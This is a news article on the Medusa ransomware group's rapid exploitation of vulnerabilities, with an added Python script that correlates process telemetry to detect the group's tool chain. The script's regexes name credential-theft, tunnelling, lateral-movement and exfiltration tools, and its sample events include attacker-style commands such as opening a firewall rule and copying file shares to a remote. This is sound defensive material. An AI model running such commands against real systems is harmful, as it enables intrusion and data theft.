Medusa Ransomware Fast to Exploit Vulnerabilities, Breached Systems
SecurityWeek, archived Apr 07, 2026
The group uses zero-days, quickly weaponizes fresh bugs, and exfiltrates and encrypts data within days of initial access.
The Medusa ransomware group has been operating at a fast pace, seizing short windows of opportunity in attacks across multiple verticals, Microsoft says.
Operating as a ransomware-as-a-service (RaaS), Medusa has been active since June 2021 and hit over 300 organizations in the critical infrastructure sector by February 2025.
The group is known for engaging in double extortion, stealing victims’ data in addition to encrypting it, as well as for relying on phishing and the exploitation of unpatched vulnerabilities for initial access.
In recent attacks, Medusa’s operators, tracked by Microsoft as Storm-1175, were seen moving rapidly from initial access to post-compromise operations, often within days or, in some cases, hours.
Additionally, the group was seen quickly weaponizing newly disclosed vulnerabilities, as well as exploiting zero-day bugs in web-facing systems.
“The threat actor’s high operational tempo and proficiency in identifying exposed perimeter assets have proven successful, with recent intrusions heavily impacting healthcare organizations, as well as those in the education, professional services, and finance sectors in Australia, the United Kingdom, and the United States,” Microsoft says.
Over the past three years, Medusa’s operators have exploited at least 16 vulnerabilities in Microsoft Exchange, PaperCut, Ivanti Connect Secure and Policy Secure, ConnectWise ScreenConnect, JetBrains TeamCity, SimpleHelp, SAP NetWeaver, CrushFTP, GoAnywhere MFT, SmarterMail, and BeyondTrust.
Storm-1175, Microsoft says, weaponizes newly disclosed vulnerabilities immediately. It was seen exploiting the NetWeaver bug one day after it was publicly disclosed on April 24, 2025.
The group was also seen chaining multiple security defects to obtain remote code execution (RCE) on the victims’ systems. It has also targeted Linux systems, including Oracle WebLogic instances.
According to Microsoft, the group has exploited at least three zero-day flaws, including CVE-2026-23760 (SmarterMail) and CVE-2025-10035 (GoAnywhere MFT). In some cases, Storm-1175 exploited the flaws seven days before public disclosure.
Following initial access, the gang typically deploys a web shell or remote access payload and proceeds to data exfiltration and the execution of file-encrypting ransomware within one day.
During this window, Storm-1175 establishes persistence, performs reconnaissance and lateral movement, modifies firewall settings to enable remote access, and exfiltrates credentials.
“We have also observed that after gaining administrator credentials, Storm-1175 has used a script to recover passwords from Veeam backup software, which is used to connect to remote hosts, therefore enabling ransomware deployment to additional connected systems,” Microsoft notes.
The hackers have been using living-off-the-land binaries such as PowerShell and PsExec, along with Cloudflare tunnels, Remote Desktop Protocol (RDP), various remote monitoring and management (RMM) tools, PDQ Deployer for payload execution, Impacket and Mimikatz for lateral movement and credential harvesting, and Bandizip and Rclone for data collection and exfiltration.
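The tooling and tempo described above translate directly into a hunt: several of the named tools showing up on one host inside a short window is a much stronger signal than any one of them alone. The following is an added example, not code from the article or from Microsoft's report. It scans constructed process-creation events in a made-up `timestamp|host|user|command line` format, labels command lines that match the tools the article attributes to Storm-1175 (firewall changes via netsh, Cloudflare tunnels, PsExec and Impacket, Mimikatz, PDQ Deployer, Bandizip, Rclone), and alerts when at least three distinct stages occur on the same host within 24 hours. The regexes, stage names, thresholds, hostnames and paths are all assumptions for illustration.

```python
"""Correlate the Storm-1175 post-compromise tool chain in process telemetry.

Added example (not from the SecurityWeek article or Microsoft's report).
Event format, regexes, stage labels, thresholds and sample hosts are assumptions.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Regex over the command line -> intrusion stage it suggests.
# Tool names come from the article; the patterns themselves are assumptions.
STAGE_PATTERNS = {
    "tunnel":       re.compile(r"cloudflared(\.exe)?\b.*\btunnel\b", re.I),
    "firewall_mod": re.compile(r"netsh\s+advfirewall\s+(firewall\s+)?(add|set)", re.I),
    "lateral":      re.compile(r"\b(psexec|wmiexec|smbexec|atexec)(\.py|\.exe)?\b", re.I),
    "credentials":  re.compile(r"\bmimikatz\b", re.I),
    "deploy":       re.compile(r"pdq\s*deploy", re.I),
    "collection":   re.compile(r"\bbandizip\b|\bbz\.exe\b", re.I),
    "exfil":        re.compile(r"\brclone(\.exe)?\b.*\b(copy|sync|move)\b", re.I),
}

WINDOW = timedelta(hours=24)   # article: exfiltration and encryption within about a day
ALERT_THRESHOLD = 3            # distinct stages on one host inside WINDOW


def classify(cmdline):
    """Return the stage label for a command line, or None if nothing matches."""
    for stage, pattern in STAGE_PATTERNS.items():
        if pattern.search(cmdline):
            return stage
    return None


def parse_event(line):
    """Parse a constructed 'timestamp|host|user|command line' record."""
    ts, host, user, cmd = line.split("|", 3)
    return {"ts": datetime.fromisoformat(ts), "host": host, "user": user, "cmd": cmd}


def correlate(lines):
    """Return {host: [(timestamp, stage), ...]} for hosts where at least
    ALERT_THRESHOLD distinct stages fall inside one WINDOW-long span."""
    per_host = defaultdict(list)
    for line in lines:
        ev = parse_event(line)
        stage = classify(ev["cmd"])
        if stage:
            per_host[ev["host"]].append((ev["ts"], stage))

    alerts = {}
    for host, hits in per_host.items():
        hits.sort()
        for i, (start, _) in enumerate(hits):
            in_window = [(t, s) for t, s in hits[i:] if t - start <= WINDOW]
            if len({s for _, s in in_window}) >= ALERT_THRESHOLD:
                alerts[host] = in_window
                break
    return alerts


# Constructed sample telemetry: hostnames, users and paths are made up.
SAMPLE_EVENTS = [
    "2026-04-01T02:10:00|WEB01|IIS APPPOOL\\app|cmd.exe /c whoami",
    "2026-04-01T02:45:00|WEB01|NT AUTHORITY\\SYSTEM|netsh advfirewall firewall add rule name=\"allow-inbound\" dir=in action=allow",
    "2026-04-01T03:05:00|WEB01|NT AUTHORITY\\SYSTEM|C:\\ProgramData\\cloudflared.exe tunnel run --token REDACTED",
    "2026-04-01T09:30:00|WEB01|CORP\\svc_backup|psexec.exe \\\\FS01 -s cmd.exe",
    "2026-04-01T11:15:00|FS01|CORP\\svc_backup|rclone.exe copy D:\\Shares remote:dump --transfers 16",
    # A lone rclone run by an ordinary user: matches "exfil" but never reaches the threshold.
    "2026-04-02T08:00:00|WS17|CORP\\alice|rclone.exe copy C:\\Users\\alice\\photos gdrive:backup",
]

if __name__ == "__main__":
    for host, chain in correlate(SAMPLE_EVENTS).items():
        stages = " -> ".join(s for _, s in chain)
        print(f"ALERT {host}: {stages} (span {chain[-1][0] - chain[0][0]})")
```

On the sample data only WEB01 crosses the threshold (firewall change, tunnel and lateral movement inside seven hours); the single Rclone runs on FS01 and WS17 are recorded but do not alert on their own, which is the point of correlating stages rather than alerting on each tool. In a real deployment the per-host grouping would typically also tie FS01's exfiltration back to the PsExec hop from WEB01.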
In light of Microsoft’s report, Tuskira co-founder and CEO Piyush Sharma and AttackIQ field CISO Pete Luban urge at-risk organizations to continuously inventory and monitor both internal and external systems to identify exploitable assets and reduce risks.
“The heightened speed and efficiency of these campaigns is a game-changer for organizations with high-pressure environments like hospitals, insurers, and banks, which is who Storm-1175 is primarily targeting. These organizations already have little tolerance for downtime, complex edge infrastructure, and a constant patching backlog, so a threat actor that can spot exposed assets and exploit them before defenders catch up has a much wider lane than it did even a year ago,” Sharma said.
Luban commented, “If unchecked, the impact is bigger than a single encrypted network segment. Medusa is built for double extortion, so the ransom threat is not just downtime, it’s the risk of public data exposure and downstream fallout like regulatory penalties, partner distrust, and long tail fraud from stolen data.”
Written by Ionut Arghire, an international correspondent for SecurityWeek.